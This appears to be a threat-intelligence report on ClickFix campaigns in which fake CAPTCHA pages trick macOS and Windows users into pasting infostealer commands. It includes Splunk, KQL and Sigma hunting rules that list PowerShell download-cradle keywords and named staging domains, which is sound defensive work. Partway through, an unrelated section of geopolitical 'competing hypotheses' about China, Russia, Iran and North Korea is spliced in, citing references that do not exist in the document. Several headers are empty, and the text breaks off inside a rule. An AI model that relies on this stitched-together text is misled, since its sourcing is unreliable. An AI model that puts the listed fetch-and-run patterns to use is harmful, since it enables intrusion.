ClickFix Attacks Expand to macOS

A macOS ClickFix campaign discovered by Palo Alto Networks Unit 42, reported on June 23, 2026, silently downloads and mounts malicious disk images to deploy an infostealer targeting browser credentials, cryptocurrency wallets, and Apple Keychain data [1]. The technique continues to evolve because it turns the user into the execution engine, bypassing most endpoint controls in the process.

ClickFix is not a single malware family. It is a social engineering method where a fake error, CAPTCHA, or verification prompt instructs the victim to open a system utility and paste a command the attacker has silently placed on their clipboard. The victim does the attacker's job for them. That fundamental mechanic has not changed. Everything around it has.

Background: From Commodity Trick to Nation-State Tool

Proofpoint named and documented the ClickFix technique in mid-2024, tracking campaigns from TA571 and ClearFake that used fake browser update pages and error overlays to trick users into running PowerShell commands [2]. In April 2025, Proofpoint documented state-sponsored actors from North Korea (TA427), Iran (TA450), and Russia (UNK_RemoteRogue, TA422) experimenting with ClickFix, moving the technique out of the purely criminal ecosystem [3]. Proofpoint noted that no actor showed repeated sustained use of the technique in the weeks following initial sightings, though TA427 returned to ClickFix with a slightly varied infection chain over two months after initial use [3].

The technique's appeal is straightforward. No malicious file needs to land on disk during the initial stage. Browser-based sandboxes do not inspect clipboard contents. UAC prompts often do not fire because the user is manually opening a trusted system utility. Security awareness programs still train users to watch for malicious links and attachments, not to distrust text they paste into their own terminal.

The New macOS Campaign: Silent DMG Mounting

The campaign reported on June 23, 2026 (based on Unit 42 intelligence first disclosed June 20, 2026) targets macOS users with a fake CAPTCHA page that instructs them to open Terminal and paste a verification command [1]. That command does something users would not expect from a CAPTCHA fix: it downloads a DMG file, silently mounts it using the native hdiutil utility, locates the application bundle inside, and launches it automatically [1].

Once running, the malware targets browser credentials, cryptocurrency wallet data, Apple Keychain data, messaging app information, and user documents [1]. The stealer payload is assessed by Unit 42 to belong to the AMOS (Atomic macOS Stealer) lineage, specifically the modern C++ Odyssey variant [4]. According to Unit 42, the assessment is based on the malware's staging directory, persistence module, and crypto-wallet trojanization behavior [4]. Microsoft separately documented macOS ClickFix campaigns where the malware replaces legitimate cryptocurrency wallet apps with trojanized versions.

This is significant. ClickFix was primarily a Windows problem for most of its lifespan. The macOS variant proves operators are building platform-specific kill chains, not just porting PowerShell commands.

Windows Execution: The Win+R Path and Defensive Response

The standard ClickFix flow on Windows tells users to press Win+R to open the Run dialog, then paste the malicious command. The malicious payload, often a PowerShell command or an mshta.exe call, has already been silently injected into the clipboard by JavaScript running on the page. The user simply completes the sequence, believing they are verifying their identity or resolving a technical issue. From the workstation's perspective, using the Win+R shortcut ensures the process executing the malicious command runs under explorer.exe as its parent process, making the activity appear more legitimate.

Defenders have responded by monitoring Win+R invocations, logging Run dialog usage, and building detections around cmd.exe or powershell.exe spawned from explorer.exe with clipboard-derived arguments.

Mitigating Windows ClickFix Abuse

Defenders have concrete options to reduce exposure from ClickFix execution paths:

Disable the Windows Run Dialog (Win+R) for standard users. Group Policy can be configured to disable the Run command dialog box, closing the primary ClickFix execution path on Windows.

Deploy PowerShell Constrained Language Mode. Enforce via WDAC or AppLocker policies to block arbitrary script execution from pasted commands. Test against business-critical PowerShell workflows before broad deployment.

Monitor process lineage. Any powershell.exe, pwsh.exe, cmd.exe, mshta.exe, or WindowsTerminal.exe process spawned by explorer.exe should generate a high-fidelity alert. This catches the Win+R shortcut path.

Restrict PowerShell execution for non-administrative users. Prevent non-administrative users from executing PowerShell where operationally feasible.

Who Gets Targeted: Drive-By vs. Intentional

ClickFix campaigns split into two targeting models, and the distinction matters for defenders trying to assess their risk.

Drive-By (Opportunistic)

The bulk of ClickFix activity remains opportunistic. Malvertising chains, compromised websites, and SEO-poisoned search results funnel victims to fake CAPTCHA pages or browser update prompts [2]. The macOS campaign Unit 42 found fits this model: users land on a fake verification page and self-infect [1]. These campaigns cast a wide net and rely on volume. Any user browsing the web is a potential target.

Intentional (Targeted)

A growing subset of ClickFix operations targets specific individuals or roles. Proofpoint documented targeted ClickFix campaigns by state-sponsored actors, including TA427 (North Korea) using ClickFix with compromised infrastructure and dynamic DNS services in early 2025, and TA450 (Iran) sending ClickFix phishing emails in November 2024 [3]. Developer-focused campaigns using fake GitHub repository notifications and ClickFix-style verification pages have been documented by multiple vendors, including Sekoia (GitHub issues campaign delivering Lumma Stealer) and Datadog (fake repositories delivering macOS infostealers).

State-sponsored actors assessed to be linked to North Korea (tracked as TA427 by Proofpoint) have experimented with ClickFix in targeted campaigns, though Proofpoint assessed that each state-sponsored actor was only observed with one ClickFix campaign or wave, and it remains unclear whether the technique achieved the success rates these actors expected [3].

Clipboard Hijacking Techniques

ClickFix relies on JavaScript clipboard injection to load payloads into the victim's clipboard. In observed campaigns, the malicious page silently writes a PowerShell or mshta.exe command to the clipboard, then instructs the user to paste it into the Run dialog or PowerShell terminal [2].

Some campaigns use comment strings or padding to hide the actual malicious command. Campaigns have been observed where the victim sees only a benign-looking string in the Run dialog, while the actual PowerShell download cradle is hidden beyond the visible area of the text field [2].

Unit 42's macOS analysis shows the clipboard payload leveraging native macOS utilities (hdiutil, open) rather than downloading a separate script interpreter, which makes the pasted command look more plausible to a technical user who glances at it before executing [1].

IOC Table

MITRE ATT&CK Mapping

Detection and Hunting

Process lineage monitoring is the single highest-value detection. Alert on powershell.exe, pwsh.exe, cmd.exe, mshta.exe, or WindowsTerminal.exe spawned by explorer.exe. On macOS, watch for Terminal.app or iTerm spawning curl, hdiutil, or open in rapid succession.

// Splunk example for Windows
index=sysmon EventCode=1 (Image="*powershell.exe" OR Image="*cmd.exe" OR Image="*WindowsTerminal.exe")
| where ParentImage LIKE "%explorer.exe"

// macOS: osquery or Endpoint Detection
SELECT * FROM process_events
WHERE parent_path LIKE '%Terminal%'
AND (path LIKE '%hdiutil%' OR path LIKE '%curl%')
AND time > (SELECT CAST(strftime('%s','now','-5 minutes') AS INTEGER));

DNS monitoring for newly registered or low-reputation domains with unusual TLDs (.beer, .top, .xyz) used as C2 endpoints [1].

Clipboard write monitoring where endpoint tooling supports it. Some EDR solutions may be able to track clipboard API calls from browser processes; verify specific capabilities with your vendor. High-frequency writeText() calls from web content processes warrant investigation.

DMG mount events on macOS. Monitor for hdiutil attach commands executed from Terminal, especially when followed by open commands targeting .app bundles from mounted volumes [1].

Analysis

We assess that ClickFix has reached a significant inflection point. It started as a Windows-only social engineering technique and has become a cross-platform initial access method used by both criminal operators and state-sponsored groups. The macOS variant Unit 42 documented shows real development effort: silent DMG mounting, crypto-wallet trojanization behavior, and broad data targeting are not throwaway capabilities [1].

Targeting patterns suggest two parallel tracks running simultaneously. Mass opportunistic campaigns continue to generate volume through malvertising and SEO poisoning. Targeted operations by state-sponsored actors use tailored pretexts, though Proofpoint has noted that state actors have not yet shown sustained repeated use of the technique [3].

References

[1] https://www.bleepingcomputer.com/news/security/new-macos-clickfix-attack-silently-mounts-dmgs-to-push-infostealer/

[2] https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn

[3] https://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix

[4] https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2026-06-20-ClickFix-campaign-delivers-macOS-infostealer-via-DMG.txt

Event Timeline

Entity Relationships

Diamond Model

Competing Hypotheses

Multiple sources offer competing assessments on key analytic questions in this report. The body above reflects the assessed primary line; alternative hypotheses and the indicators that would shift the assessment are surfaced below for analyst review.

China

Question 1.

Primary assessment. Does the downgraded Taiwan invasion timeline reduce or increase the cyber threat?

Alternative hypothesis. View A: The IC assessment that China doesn't plan a 2027 invasion suggests reduced near-term military risk. Source: [22] | View B: The briefing argues (and sources support) that below-threshold cyber and influence operations may intensify as substitutes for kinetic action. Sources: [19], [22], [17]

Indicators that would shift assessment:

• New primary-source reporting that directly contradicts the primary assessment
• Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
• Public statement, indictment, or vendor advisory naming the alternative as authoritative

Question 2.

Primary assessment. Is Storm-1175 a state-directed Chinese APT or a financially motivated cybercriminal group?

Alternative hypothesis. View A: The Hacker News [12] labels Storm-1175 as 'China-Linked,' implying state nexus. The briefing places it alongside state-directed infrastructure pre-positioning activities. | View B: Microsoft's primary source describes Storm-1175 as a 'financially motivated cybercriminal' actor, which is distinct from state-directed espionage groups. Web verification confirms Microsoft's characterization.

Indicators that would shift assessment:

• New primary-source reporting that directly contradicts the primary assessment
• Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
• Public statement, indictment, or vendor advisory naming the alternative as authoritative

Question 3.

Primary assessment. Have PLA purges degraded China's military capabilities?

Alternative hypothesis. View A: The IISS assessed the purges left the military with 'serious deficiencies in its command structure' and PLA exercises took substantially longer to implement in 2025. Sources: [28], [14] | View B: The leadership purges have 'not significantly disrupted the PLA's normal functions or operations' and the effects are temporary, with some arguing the PLA may compensate with more aggressive activity. Sources: [28]

Indicators that would shift assessment:

• New primary-source reporting that directly contradicts the primary assessment
• Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
• Public statement, indictment, or vendor advisory naming the alternative as authoritative

Question 4.

Primary assessment. Why did PLAAF incursions into Taiwan's ADIZ decline in early 2026?

Alternative hypothesis. View A: Beijing may be trying to avoid escalating tensions ahead of the Trump-Xi summit (diplomatic signal). Sources: [17] | View B: The decline could relate to ongoing PLA leadership purges that have had a 'paralyzing effect' on the military (operational disruption). Sources: [17], [14], [28]

Indicators that would shift assessment:

• New primary-source reporting that directly contradicts the primary assessment
• Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
• Public statement, indictment, or vendor advisory naming the alternative as authoritative

Question 5.

Primary assessment. How many organizations has Salt Typhoon compromised?

Alternative hypothesis. View A: Source [10] and FBI officials cite 'at least 200 companies' worldwide (August 2025 figure). | View B: The Global Cyber Alliance and Nextgov/FCW (August 2025) report that 600+ organizations were notified by the FBI of Salt Typhoon interest in their systems, across 80+ countries, suggesting a much larger scope than 200 confirmed compromises.

Indicators that would shift assessment:

• New primary-source reporting that directly contradicts the primary assessment
• Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
• Public statement, indictment, or vendor advisory naming the alternative as authoritative

Question 6.

Primary assessment. Will the SCOTUS IEEPA ruling lead to reduced tariffs on China?

Alternative hypothesis. View A: The ruling invalidates all IEEPA tariffs, potentially leading to lower tariff rates on Chinese goods [24]. | View B: The President immediately imposed replacement tariffs under Section 122 of the Trade Act of 1974 (confirmed via web search), with administration officials stating the goal is 'virtually unchanged tariff revenue.' The briefing's Outlook scenario that 'the ruling leads to a reduction in tariffs' may already be overtaken by events.

Indicators that would shift assessment:

• New primary-source reporting that directly contradicts the primary assessment
• Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
• Public statement, indictment, or vendor advisory naming the alternative as authoritative

Question 7.

Primary assessment. What is the impact of PLA purges on China's cyber capabilities?

Alternative hypothesis. View A: Purges cause 'serious deficiencies' in PLA command structure that are 'likely to be a temporary disturbance' (IISS via [17]). | View B: Red Sheep assessment suggests purges may be motivated by operational security failures related to cyber operation exposure (I-Soon, Expedition Cloud leaks), which could lead to tighter compartmentalization. Source [16] quotes Xi on disloyalty but doesn't specify cyber-related concerns.

Indicators that would shift assessment:

• New primary-source reporting that directly contradicts the primary assessment
• Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
• Public statement, indictment, or vendor advisory naming the alternative as authoritative

Question 8.

Primary assessment. Has Salt Typhoon been remediated from major U.S. telecom networks?

Alternative hypothesis. View A: Salt Typhoon has NOT been fully remediated: Senate expert testimony, TechCrunch reporting, and FBI officials indicate hackers are 'likely still inside U.S. networks' [9][10]. The FBI's top cyber official said threats are 'still very much ongoing' (confirmed via web search from CyberScoop, Feb 2026). | View B: Major telecoms claim remediation: AT&T stated in late 2024 it detected 'no activity by nation-state actors' and Verizon claimed to have 'contained the cyber incident' (per web search results). However, both companies have refused to provide documentation to the Senate [9].

Indicators that would shift assessment:

• New primary-source reporting that directly contradicts the primary assessment
• Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
• Public statement, indictment, or vendor advisory naming the alternative as authoritative

Russia

Question 1.

Primary assessment. Does the convergence of Russian and Chinese tradecraft represent coordinated strategy or parallel evolution?

Alternative hypothesis. View A: Finland's Supo [8] assesses Russia has adopted Chinese-style techniques, suggesting deliberate tradecraft adoption. The briefing's Red Sheep assessment frames this as a unified strategic program. | View B: The convergence could reflect independent optimization toward the same low-cost attack surface (consumer edge devices) rather than a coordinated or derivative relationship. Amazon [7] describes it as a cost-benefit decision, not as Chinese emulation.

Indicators that would shift assessment:

• New primary-source reporting that directly contradicts the primary assessment
• Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
• Public statement, indictment, or vendor advisory naming the alternative as authoritative

Question 2.

Primary assessment. How should the GLOBSEC hybrid incident numbers (150+ EU/NATO vs 321 in Germany) be reconciled?

Alternative hypothesis. View A: The numbers reflect different counting methodologies or temporal windows within the same GLOBSEC report [16], suggesting Germany uses a broader definition of 'hybrid incident' including drone intrusions and disinformation campaigns. | View B: The EU/NATO figure of 150+ may reflect only confirmed/high-confidence incidents while Germany's 321 includes lower-confidence suspected events. The briefing presents both as equivalent metrics.

Indicators that would shift assessment:

• New primary-source reporting that directly contradicts the primary assessment
• Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
• Public statement, indictment, or vendor advisory naming the alternative as authoritative

Question 3.

Primary assessment. Is the U.S. sanctions relaxation a deliberate strategic deprioritization of cyber deterrence or merely transactional diplomatic maneuvering?

Alternative hypothesis. View A: The OFAC CYBER2 delistings and GL 134 represent a policy shift that deprioritizes cyber-specific sanctions enforcement, potentially reducing the perceived cost of Russian cyber operations. Sources [10], [11], [12] document the pattern of removals. | View B: The removals could be tactical concessions in broader diplomatic negotiations (e.g., tied to energy supply concerns from the Persian Gulf war per Source [11]) rather than a deliberate abandonment of cyber deterrence. No source explicitly confirms a policy directive to deprioritize cyber sanctions.

Indicators that would shift assessment:

• New primary-source reporting that directly contradicts the primary assessment
• Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
• Public statement, indictment, or vendor advisory naming the alternative as authoritative

Question 4.

Primary assessment. Was Operation Horizon a response to the ELECTRUM/DER attack or to railway sabotage?

Alternative hypothesis. View A: The briefing implies it was launched in response to or in the context of the December 2025 DER attack. | View B: Web search confirms Operation Horizon launched November 21, 2025, before the DER attack, in response to railway sabotage incidents. It was later extended in 2026.

Indicators that would shift assessment:

• New primary-source reporting that directly contradicts the primary assessment
• Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
• Public statement, indictment, or vendor advisory naming the alternative as authoritative

Question 5.

Primary assessment. Did pro-Russia hacktivists actually achieve OT access to Israeli water systems?

Alternative hypothesis. View A: NoName057(16) claimed 'full access to HMIs of Israeli water management systems' per source [2]. | View B: Flashpoint analysts have not verified these claims per source [2], and the source notes that 'these groups regularly inflate the impact of their attacks for media attention.'

Indicators that would shift assessment:

• New primary-source reporting that directly contradicts the primary assessment
• Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
• Public statement, indictment, or vendor advisory naming the alternative as authoritative

Question 6.

Primary assessment. What is the significance of Russia's small 2026 military expansion?

Alternative hypothesis. View A: The briefing's primary read: resource constraints are pushing Moscow to prioritize asymmetric tools (cyber, sabotage) over conventional force growth. | View B: The Red Sheep section offers a contrarian read: the small expansion could indicate strategic confidence that hybrid/cyber tools are delivering sufficient results, making further conventional buildup unnecessary.

Indicators that would shift assessment:

• New primary-source reporting that directly contradicts the primary assessment
• Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
• Public statement, indictment, or vendor advisory naming the alternative as authoritative

Question 7.

Primary assessment. How quickly did APT28 weaponize CVE-2026-21509 after disclosure?

Alternative hypothesis. View A: Trellix (source [9]) claims weaponization within 24 hours of public disclosure. | View B: Zscaler (Operation Neusploit) observed active exploitation on January 29, three days after the January 26 patch release. Dark Reading headline reads 'Russian Hackers Weaponize Microsoft Office Bug in Just 3 Days.' The 24-hour vs. 3-day discrepancy may reflect different measurement points (disclosure vs. patch release vs. first observed exploitation).

Indicators that would shift assessment:

• New primary-source reporting that directly contradicts the primary assessment
• Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
• Public statement, indictment, or vendor advisory naming the alternative as authoritative

Iran

Question 1.

Primary assessment. How credible are Handala's claimed attack impacts, given Iranian groups are known to exaggerate?

Alternative hypothesis. View A: Source [3] and Handala's claims cite 200,000 devices wiped, 50TB exfiltrated. FDD [web search] notes these numbers. | View B: FDD analysis [web search] explicitly warns that 'Handala, like other Iranian cyber threat actors, exaggerate the operational impact of its attacks.' The Stryker briefing acknowledges the range (80K-200K) but does not flag the exaggeration concern.

Indicators that would shift assessment:

• New primary-source reporting that directly contradicts the primary assessment
• Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
• Public statement, indictment, or vendor advisory naming the alternative as authoritative

Question 2.

Primary assessment. Does the ceasefire increase or decrease the cyber threat to U.S. organizations?

Alternative hypothesis. View A: Source [9] and experts cited therein assess the ceasefire will lead to increased cyberattacks on U.S. organizations as hackers shift from regional to U.S. targets. | View B: A standard analysis might assess that cessation of hostilities reduces motivation for retaliatory cyber operations. The briefing's Red Sheep Assessment argues the contrarian view that pauses are more dangerous than active hostilities.

Indicators that would shift assessment:

• New primary-source reporting that directly contradicts the primary assessment
• Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
• Public statement, indictment, or vendor advisory naming the alternative as authoritative

Question 3.

Primary assessment. What is the actual scope of the Stryker MDM wipe — 80,000 or 200,000 devices?

Alternative hypothesis. View A: Source [3] (tech-insider.org) and Handala's own claims say 200,000+ devices. FDD analysis [web search] says 'over 200,000 employee devices.' | View B: HIPAA Journal [web search] reports 'almost 80,000 Windows devices.' Stryker itself has not confirmed a specific number. The wide range (80,000 to 200,000) reflects uncertainty between Handala's claims and independent estimates.

Indicators that would shift assessment:

• New primary-source reporting that directly contradicts the primary assessment
• Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
• Public statement, indictment, or vendor advisory naming the alternative as authoritative

Question 4.

Primary assessment. Did Iran's internet blackout degrade or fail to degrade its offensive cyber capabilities?

Alternative hypothesis. View A: Unit 42 [6] assesses the blackout 'will likely hinder sophisticated cyberattack coordination' and may lead to 'deviations from previously established patterns' — suggesting degradation of coordination capability. | View B: Unit 42 [6] also notes 'dozens of threat groups operating outside Iran plus pre-planted backdoors kept attacks running at full speed,' and the Red Sheep Assessment argues the blackout has not stopped operations. Check Point [19] confirms Handala operating from Starlink IPs.

Indicators that would shift assessment:

• New primary-source reporting that directly contradicts the primary assessment
• Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
• Public statement, indictment, or vendor advisory naming the alternative as authoritative

North Korea

Question 1.

Primary assessment. What is the accurate scale of the Bybit theft: $1.46 billion or $1.5 billion?

Alternative hypothesis. View A: FBI IC3 PSA [3] states 'approximately $1.5 billion' — the official government attribution figure. | View B: CyberScoop [4] reports '$1.46B' based on market valuations at time of reporting. The Wilson Center [5] says 'more than $1.5 billion.'

Indicators that would shift assessment:

• New primary-source reporting that directly contradicts the primary assessment
• Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
• Public statement, indictment, or vendor advisory naming the alternative as authoritative

Question 2.

Primary assessment. Are DPRK financial theft operations and supply chain compromise converging into a unified strategy or operating as separate tracks?

Alternative hypothesis. View A: The Red Sheep Assessment argues they are converging, citing the Bybit attack path through Safe{Wallet} [5], Contagious Interview's targeting of developer environments [9], and npm package poisoning at scale [10]. | View B: The conventional framing, acknowledged by the briefing, treats these as separate threat categories. Financial theft (Lazarus/TraderTraitor) and developer supply chain compromise (Contagious Interview/Famous Chollima) may operate under different RGB sub-units with different objectives. No source explicitly confirms organizational or strategic convergence.

Indicators that would shift assessment:

• New primary-source reporting that directly contradicts the primary assessment
• Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
• Public statement, indictment, or vendor advisory naming the alternative as authoritative

Question 3.

Primary assessment. Does the US National Security Strategy omission of North Korea signal reduced attention or is it a deliberate strategic choice?

Alternative hypothesis. View A: The omission signals to Pyongyang that its cyber operations face reduced strategic-level attention, potentially emboldening further operations [30]. This is the briefing's framing. | View B: The omission could reflect a deliberate strategy to avoid elevating North Korea's status or could signal that the administration plans to address DPRK through the China relationship rather than directly. Source [27] notes Trump remains 'positive about dialogue' with Kim, suggesting engagement rather than neglect.

Indicators that would shift assessment:

• New primary-source reporting that directly contradicts the primary assessment
• Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
• Public statement, indictment, or vendor advisory naming the alternative as authoritative

Question 4.

Primary assessment. Is Russian technology transfer to DPRK producing immediate offensive cyber/EW capability or is it a future risk?

Alternative hypothesis. View A: Technology transfer is already underway and producing results: 3,000 soldiers returned with hands-on experience [24], $5.6-9.8B in Russian capital flowing to DPRK defense industry [25], and the 9th Party Congress formalized EW/AI as priorities [21]. Supported by the Red Sheep Assessment. | View B: Most analysis frames Russian technology transfer as a future risk rather than a current capability. The Lowy Institute [22] notes the EW/AI emphasis 'may stem from' battlefield experience — hedged language suggesting the causal chain is not yet confirmed. Combat experience in drone/artillery operations does not necessarily translate to offensive cyber or EW capability development.

Indicators that would shift assessment:

• New primary-source reporting that directly contradicts the primary assessment
• Convergent coverage of the alternative view from at least two independent Tier 1–2 sources
• Public statement, indictment, or vendor advisory naming the alternative as authoritative

Hunt Guide: ClickFix Social Engineering Campaign — macOS AMOS Stealer and Windows Execution Paths

Attribution: Detection logic below credits its original author. Rules adapted, ported, or quoted from a public source retain that source's author (e.g. SigmaHQ / Florian Roth, Elastic, Emerging Threats, Abuse.ch, or the cited vendor/researcher). Only rules explicitly marked RedSheep Security/Stone (original) were authored in-house. If you reuse a rule, preserve its stated attribution.

Hypothesis: If ClickFix social engineering campaigns are active against our environment, we expect to observe (1) explorer.exe spawning powershell.exe, cmd.exe, mshta.exe, or WindowsTerminal.exe via the Win+R Run dialog path on Windows endpoints, (2) Terminal.app or iTerm spawning curl, hdiutil, or open commands on macOS endpoints, (3) DNS queries to known staging/C2 domains (svs-verificationdate[.]beer, fewfwfwfwfwf[.]info), and (4) DMG mount events from Terminal on macOS in Sysmon, EDR process telemetry, DNS logs, and macOS unified logs.

Intelligence Summary: ClickFix is a cross-platform social engineering technique where fake CAPTCHAs, browser errors, or verification prompts instruct users to open a system utility and paste attacker-supplied clipboard contents. A newly reported macOS variant (June 2026, Unit 42) silently downloads and mounts malicious DMGs to deploy the AMOS/Odyssey infostealer targeting browser credentials, cryptocurrency wallets, and Apple Keychain data. The technique has been adopted by both criminal operators and state-sponsored groups (TA427/North Korea, TA450/Iran, TA422/Russia), representing a significant cross-platform initial access method that bypasses most endpoint controls by turning the user into the execution engine.

Confidence: High | Priority: High

Scope

• Networks: All enterprise endpoints (Windows and macOS), with emphasis on segments containing user workstations with browser access. Include VPN-connected remote endpoints and BYOD macOS devices. Prioritize networks with users who handle cryptocurrency, financial data, or have administrative privileges.
• Timeframe: Initial IOC sweep: 90 days retrospective from June 25, 2026. Behavioral hunt: 30 days retrospective, with ongoing monitoring. The Unit 42 disclosure was June 20, 2026, but the technique has been active since mid-2024 — extend retrospective lookback if initial findings warrant.
• Priority Systems: macOS endpoints (highest priority for this campaign variant), developer workstations, endpoints used for cryptocurrency operations, endpoints with access to financial systems, executive/leadership endpoints, endpoints of users in roles targeted by TA427/TA450 (policy, diplomacy, defense). Windows endpoints in environments where Run dialog and PowerShell are not restricted.

MITRE ATT&CK Techniques

T1204.002 — User Execution: Malicious File (Execution) [P2]

ClickFix relies on the victim manually opening Terminal (macOS) or Run dialog (Windows) and pasting attacker-supplied commands. The user is the execution engine — no exploit or dropper is needed. On macOS, the pasted command downloads and mounts a DMG containing the AMOS stealer. On Windows, the user pastes PowerShell or mshta commands into the Run dialog.

Splunk SPL:

index=sysmon EventCode=1 (Image="*\\powershell.exe" OR Image="*\\pwsh.exe" OR Image="*\\cmd.exe" OR Image="*\\mshta.exe" OR Image="*\\WindowsTerminal.exe") ParentImage="*\\explorer.exe" | eval risk_score=case(like(CommandLine,"%Invoke-WebRequest%"),90, like(CommandLine,"%IEX%"),95, like(CommandLine,"%DownloadString%"),95, like(CommandLine,"%http%"),80, 1=1,70) | where risk_score>=70 | table _time, ComputerName, User, ParentImage, Image, CommandLine, risk_score | sort -risk_score

Elastic KQL:

process.parent.name:"explorer.exe" AND process.name:("powershell.exe" OR "pwsh.exe" OR "cmd.exe" OR "mshta.exe" OR "WindowsTerminal.exe") AND event.action:"start"

Sigma Rule:

title: ClickFix - Suspicious Process Spawned from Explorer via Run Dialog
id: a1b2c3d4-e5f6-7890-abcd-ef1234567890
status: experimental
author: RedSheep Security/Stone
date: 2026/06/25
description: Detects processes commonly abused by ClickFix campaigns spawned from explorer.exe, indicating potential Win+R Run dialog abuse where the user pastes attacker-supplied commands.
references:
    - https://www.bleepingcomputer.com/news/security/new-macos-clickfix-attack-silently-mounts-dmgs-to-push-infostealer/
    - https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\explorer.exe'
    selection_child:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\cmd.exe'
            - '\mshta.exe'
            - '\WindowsTerminal.exe'
    condition: selection_parent and selection_child
falsepositives:
    - Legitimate use of Win+R to launch command-line utilities by administrators
    - IT automation tools that spawn processes via explorer.exe
level: high
tags:
    - attack.execution
    - attack.t1204.002
    - attack.t1059.001

Attribution: RedSheep Security/Stone (original)

High-value behavioral detection. Expect false positives from IT administrators who use Win+R for legitimate administrative tasks. Tune by excluding known admin accounts or known legitimate command patterns. Combine with CommandLine analysis for higher fidelity — look for web download cradles (Invoke-WebRequest, curl, wget), encoded commands (-enc, -e), or mshta with URLs.

T1059.001 — Command and Scripting Interpreter: PowerShell (Execution) [P1]

The primary Windows execution path for ClickFix. Attacker JavaScript silently writes a PowerShell download cradle or encoded command to the victim's clipboard. The victim pastes it into the Run dialog or PowerShell terminal. Commands often include Invoke-WebRequest, IEX(New-Object Net.WebClient).DownloadString(), or Base64-encoded payloads. Some campaigns use comment padding to hide malicious content beyond the visible area of the Run dialog.

Splunk SPL:

index=windows sourcetype="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventCode=4104 | where match(ScriptBlockText, "(?i)(Invoke-WebRequest|IEX|DownloadString|DownloadFile|Start-BitsTransfer|Invoke-Expression|Net\.WebClient|webclient|http|base64)") | eval suspicious_length=len(ScriptBlockText) | where suspicious_length > 200 | table _time, ComputerName, UserID, ScriptBlockText, suspicious_length | sort -_time

Elastic KQL:

event.code:"4104" AND powershell.file.script_block_text:(*Invoke-WebRequest* OR *IEX* OR *DownloadString* OR *DownloadFile* OR *Net.WebClient* OR *base64* OR *Start-BitsTransfer*)

Sigma Rule:

title: ClickFix - PowerShell Download Cradle from Explorer Parent
id: b2c3d4e5-f6a7-8901-bcde-f23456789012
status: experimental
author: RedSheep Security/Stone
date: 2026/06/25
description: Detects PowerShell processes spawned by explorer.exe (Win+R path) containing download cradle patterns commonly used in ClickFix campaigns.
references:
    - https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\explorer.exe'
    selection_process:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
    selection_cmdline:
        CommandLine|contains:
            - 'Invoke-WebRequest'
            - 'IEX'
            - 'DownloadString'
            - 'DownloadFile'
            - 'Net.WebClient'
            - 'Start-BitsTransfer'
            - '-enc '
            - '-EncodedCommand'
            - 'FromBase64String'
    condition: selection_parent and selection_process and selection_cmdline
falsepositives:
    - Legitimate admin scripts launched from Run dialog
level: critical
tags:
    - attack.execution
    - attack.t1059.001

Attribution: RedSheep Security/Stone (original)

Critical detection. The combination of explorer.exe parent + PowerShell + download cradle is highly indicative of ClickFix. Base64-encoded commands are especially suspicious when launched from explorer.exe. Consider also monitoring for very long command lines (>500 characters) from explorer.exe child processes, as ClickFix payloads often use padding/comments to hide content.

T1059.004 — Command and Scripting Interpreter: Unix Shell (Execution) [P2]

The macOS ClickFix variant instructs users to open Terminal.app and paste a command that uses native macOS utilities (curl for download, hdiutil for silent DMG mounting, open for app launch). The command chain downloads a DMG, mounts it silently, locates the .app bundle inside, and launches it — all from a single pasted command.

Splunk SPL:

index=macos_edr (process_name="curl" OR process_name="hdiutil" OR process_name="open") parent_process_name="*Terminal*" | transaction host maxspan=60s | where mvcount(process_name)>=2 AND (like(process_name,"%curl%") AND like(process_name,"%hdiutil%")) | table _time, host, user, parent_process_name, process_name, command_line

Elastic KQL:

process.parent.name:(*Terminal* OR *iTerm*) AND process.name:("curl" OR "hdiutil" OR "open") AND event.action:"exec"

Sigma Rule:

title: ClickFix macOS - Terminal Spawns Curl and Hdiutil for DMG Download and Mount
id: c3d4e5f6-a7b8-9012-cdef-345678901234
status: experimental
author: RedSheep Security/Stone
date: 2026/06/25
description: Detects the macOS ClickFix attack pattern where Terminal spawns curl to download a DMG file followed by hdiutil to mount it. This matches the Unit 42 reported campaign where fake CAPTCHA pages instruct victims to paste commands that silently download and mount malicious disk images.
references:
    - https://www.bleepingcomputer.com/news/security/new-macos-clickfix-attack-silently-mounts-dmgs-to-push-infostealer/
    - https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2026-06-20-ClickFix-campaign-delivers-macOS-infostealer-via-DMG.txt
logsource:
    category: process_creation
    product: macos
detection:
    selection_parent:
        ParentImage|contains:
            - 'Terminal'
            - 'iTerm'
    selection_hdiutil:
        Image|endswith: '/hdiutil'
        CommandLine|contains: 'attach'
    condition: selection_parent and selection_hdiutil
falsepositives:
    - Developers manually mounting DMG files from Terminal for legitimate software installation
    - IT automation scripts that use hdiutil
level: high
tags:
    - attack.execution
